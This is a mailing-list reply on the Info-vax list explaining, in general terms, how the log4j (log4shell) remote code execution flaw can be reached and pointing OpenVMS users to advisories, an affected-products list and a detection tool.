[Info-vax] Java, log4j, log4shell, and OpenVMS: CVE-2021-44228, CVE-2021-45046

[Stephen Hoffman]

On 2021-12-15 03:06:43 +0000, David Turner said:

> So the vulnerability is there. How would one take advantage of it anyway?
> Wouldn't you need a privileged account to even get into the server to 
> start taking advantage of the flaws?
> Assuming one is pretty careful about access to the network, and the 
> directory permissions are controlled, wouldn't it be hard to get to do 
> any damage?
> 
> Curious as I cannot find much information outside of the warning. I 
> guess no one wants to give hackers the keys to the rolls....

It's a full remote command execution flaw (RCE), meaning that pretty 
much anything that the Java app has access to is also exposed to the 
attacker, if the attacker can get the exploit text string to the 
logging software.

Access to the vulnerable logger can be via host name string, by HTTP 
headers, or by embedding the text into other data streams, depending on 
the app involved. It varies. Widely.

What can you do with the vulnerability?  There are reportedly already 
cryptocurrency miners and ransomware efforts underway using the 
vulnerability, and I expect we'll see a long tail of more...

An intro to the log4j vulnerability from the Swiss government: 
https://www.govcert.ch/blog/zero-day-exploit-targeting-popular-java-library-log4j/ 


List of affected products (re-post) : 
https://gist.github.com/SwitHak/b66db3a06c2955a9cb71a8718970c592

One of the security vendors with some info: 
https://www.lunasec.io/docs/blog/log4j-zero-day-mitigation-guide/

There's a Python detection tool at that last URL, though I've not 
checked to see if that might be reasonably portable to OpenVMS.

Been working with some OpenVMS folks on this, and y'all with Java 
installed and Java apps in use will want to take a look at what's in 
those jars. Or if you have Java installed and don't need it, best 
remove it.


-- 
Pure Personal Opinion | HoffmanLabs LLC